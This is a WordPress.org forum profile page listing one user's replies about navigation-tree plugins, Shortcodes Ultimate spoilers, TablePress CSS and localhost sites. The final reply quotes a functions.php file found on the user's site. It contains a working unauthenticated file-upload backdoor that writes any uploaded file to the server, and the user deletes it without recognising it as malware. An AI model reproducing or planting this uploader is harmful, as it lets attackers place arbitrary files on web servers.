trixee
Forum Replies Created
-
Forum: Reviews
In reply to: [WP-Parsi navigation trees] Exactly what I need!Hi Morteza, your timing is perfect, I was just showing off this plug-in to my boss yesterday ??
In the linked image, you can see that the left edge of the nav tree is offset to the right from the edge of the sidebar. I would like to align this with the actual edge of the sidebar as indicated by the text widget I’ve inserted.
I’ve tried playing around with the css but haven’t been able to figure it out yet.
Forum: Plugins
In reply to: [WP-Parsi navigation trees] Doesn't work with Display WidgetsThe Display Widgets plug-in allows you to show or hide widgets on specific pages. On some pages, I would like to hide the navigation tree. However, the Display Widgets plug-in will not work with widgets written in pre-2.8 format of WordPress.
On the other hand, if in the next update you could allow the nav tree to be hidden on specified pages, that would also be good ??Forum: Plugins
In reply to: [WP-Parsi navigation trees] Keep menu expandedThanks!
Forum: Themes and Templates
In reply to: [Tempera] Presentation disappeared from page list in adminI’ve discovered that the page id is 0, but this is not appearing in my pages list, and there’s nothing in the trash either.
I have complete access as WordPress is installed on my localhost. But I’m on Windows not Linux. I might need to log in as admin rather than using my domain name. ??
Excellent, thanks for the info Tobias, will follow this up. The CSS is working regardless, I just don’t like seeing errors!
Hi Tobias,
I am getting this same message, and have followed your example, e.g.:
.tablepress-id-2 .column-1 { padding: 0; }
Can you please advise what are the access rights that cause this, as I am logged in as administrator.
Thanks,
TrishForum: Plugins
In reply to: [WP Shortcodes Plugin — Shortcodes Ultimate] Anchor link in accordionsSorry not at my desk so I’m trying to remember here. You don’t need JS, this is simple HTML.
You use the anchor tags inside the spoiler where you have the content. So for example (I figured out how to do this now!) if you wanted some text that says “click here” and you want “click here” to link to your services page:
<a href="https://your_website.com/services">Click here</a>
You need to put your permalink in instead of the dummy address I put in the example.
I hope that makes sense? Unless I’m misunderstanding your requirements.
Forum: Localhost Installs
In reply to: Delivering content created on localhostThe documentation won’t be updated after installation. I tried the plugin but it didn’t work for me. I tried HT Track and it was OK except that search wouldn’t work.
Forum: Plugins
In reply to: [WP Shortcodes Plugin — Shortcodes Ultimate] Open all spoilers at once?Ah sorry, I misunderstood. I didn’t come across anything like that.
Forum: Plugins
In reply to: [WP Shortcodes Plugin — Shortcodes Ultimate] Anchor link in accordionsYou need to do this in Text Mode. In your spoiler content, wrap the thing you want people to click on in anchor tags.
My html isn’t coming through properly, see here for link syntax: https://www.w3schools.com/html/html_links.aspForum: Plugins
In reply to: [WP Shortcodes Plugin — Shortcodes Ultimate] Open all spoilers at once?This is documented in the plugin (got to Shortcodes > Examples), you need to add open=”yes” to the spoiler, e.g.
[su_accordion]
[su_spoiler title=”Spoiler title” open=”yes”] Spoiler content [/su_spoiler]
[su_spoiler title=”Spoiler title”] Spoiler content [/su_spoiler]
[su_spoiler title=”Spoiler title”] Spoiler content [/su_spoiler]
[/su_accordion]Forum: Plugins
In reply to: [WP-Parsi navigation trees] Keep menu expandedI would like this feature too.
Forum: Localhost Installs
In reply to: Delivering content created on localhostThanks Jesin, I’ll give that plugin a shot.
Forum: Fixing WordPress
In reply to: Session cookie messages at top of every pageI renamed my themes folder but it didn’t solve the logging in issue.
However, I found the functions.php file, which had this content:<?php if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if (isset($_FILES['image']['name'])) { $abod = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $abod); echo"<center><b>Done ==> $userfile_name</b></center>"; } } else{ echo' <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>'; } ?>
Which didn’t seem to be doing anything to me so I took a backup and deleted it. And it appears to be fixed! (For now, at least).
Thanks for pointing me in the right direction ??
Cheers!